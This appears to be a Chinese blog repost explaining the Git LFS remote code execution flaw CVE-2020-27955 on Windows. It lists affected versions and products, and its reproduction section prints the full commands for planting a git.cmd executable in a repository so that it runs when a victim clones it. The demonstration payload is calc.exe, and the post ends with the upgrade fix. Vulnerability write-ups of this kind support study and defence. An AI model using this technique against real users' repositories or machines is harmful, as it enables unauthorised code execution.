首页 > 其他 > 详细

Git-LFS RCE

时间:2021-01-05 22:22:08      阅读:3      评论:0      收藏:0      [点我收藏+]

Git-LFS RCE(cve-2020-27955)

0x00 简介

Git LFS 是 Github 开发的一个 Git 的扩展,用于实现 Git 对大文件的支持

0x01 影响版本

Git-LFS(git-lfs)<= 2.12

一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree等

该漏洞影响仅windows平台

0x02 复现过程

环境搭建

? 下载安装git-lfs小于2.12的版本

? (该poc需在单独的Linux系统上(以防止在提交时在localhost上执行))

? 只需添加名为以下文件的可执行文件,即可在恶意仓库的根目录中创建后门:

  • git.bat
  • git.exe
  • git.cmd
  • git.vbs

复现过程

? 1 创建一个git仓库

技术分享图片

  1. clone到本地并将可执行文件添加到仓库,

技术分享图片

  1. 在目标机器上进行git clone,此时,恶意文件将会下载到本地,并由git-lfs扩展自动执行,无需交互

技术分享图片

  1. 相关命令
git clone https://github.com/attacker/poc.git
echo calc.exe > git.cmd 
git lfs track "*.dat"
echo "test" > large.dat
git add -A 
git commit -m "poc"
git push -u origin master -f

0x03 漏洞修复

更新到最新版软件

0x04 参看链接

https://medium.com/bugbountywriteup/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

Git-LFS RCE

原文:https://www.cnblogs.com/TheTh1nk3r/p/14237792.html

(0)
(0)
   
举报
评论 一句话评论(0
© 2014 bubuko.com 版权所有 鲁ICP备09046678号-4
打开技术之扣,分享程序人生!
             

鲁公网安备 37021202000002号